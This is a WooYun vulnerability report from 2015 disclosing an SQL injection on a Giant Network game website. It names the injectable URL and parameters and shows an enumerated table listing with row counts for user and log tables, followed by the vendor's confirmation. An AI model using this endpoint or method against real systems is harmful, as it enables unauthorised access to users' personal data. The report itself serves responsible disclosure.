当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142723

漏洞标题:巨人某站存在SQL注入漏洞可影响大量数据泄露

相关厂商:巨人网络

漏洞作者: 路人甲

提交时间:2015-09-22 11:03

修复时间:2015-11-08 10:58

公开时间:2015-11-08 10:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

巨人某站sql注入,700W+数据泄露

详细说明:

注入点
http://gszt2.ztgame.com/article.php?aid=978493&s=19

QQ20150922-1@2x.png


QQ20150922-2@2x.png


Database: act_zt2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| zxcjv3_visitlog | 7804347 |
| dp_record | 7012769 |
| dp_msg | 2015086 |
| zxcjv3_logs | 1790487 |
| wechat_0818_forward_log | 765980 |
| wechat_0818_draw_log_mz | 653788 |
| wechat_0818_user | 644640 |
| zxcjv3_user | 500487 |
| fr_sendlog_mycard | 394684 |
| wechat_0818_openid_error | 369929 |
| frv2_sendlog_mycard | 359527 |
| dds_play_log | 208769 |
| hb_user | 197055 |
| dds_user | 153518 |
| child_logs | 113627 |
| wanyouxi_user | 92383 |
| yyl_logs | 91152 |
| lb_user | 90779 |
| bz_logs | 77295 |
| commander_logs | 74674 |
| child_user | 66259 |
| shuang_user | 63794 |
| wechat_0818_draw_log | 51105 |
| bz_user | 48966 |
| chinaip | 46287 |
| wanyouxi_logs | 44800 |
| shuang_item_log | 41163 |
| card_log_2030 | 41056 |
| shouji_user | 22883 |
| haoshengyin_votes | 19849 |
| yyl_user | 18859 |
| `4y_review` | 6763 |
| dds_invite_log | 6735 |
| wj_vote | 6345 |
| dahao_member | 5200 |
| sword_user | 4885 |
| dds_share_log | 4685 |
| sword_vote_log | 3926 |
| waigua_jubao | 3755 |
| article | 2658 |
| zxcjv3_cards | 2460 |
| the9_review | 1835 |
| wj_review | 1603 |
| reason | 739 |
| upload | 203 |
| haoshengyin | 131 |
| dahao_team | 130 |
| reward_user | 96 |
| commander | 68 |
| dp_province | 35 |
| basicdata | 20 |
| zxcjv3_items | 12 |
| lotto_gift_type | 8 |
| sword_vote_info | 8 |
| dp_point | 6 |
| reward_act | 6 |
| wechat_0818_item | 6 |
| hb_items | 5 |
| catalogue | 4 |
| commander_lucky | 4 |
| of_info | 3 |
| wj0612_vote | 3 |
| dp_logs | 2 |
| wj0612_review | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 774 |
| STATISTICS | 216 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| KEY_COLUMN_USAGE | 99 |
| TABLES | 98 |
| TABLE_CONSTRAINTS | 95 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 6 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


QQ20150922-3@2x.png

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-24 10:57

厂商回复:

感谢,我们已收到目前正在处理,谢谢您的及时反馈结果。

最新状态:

暂无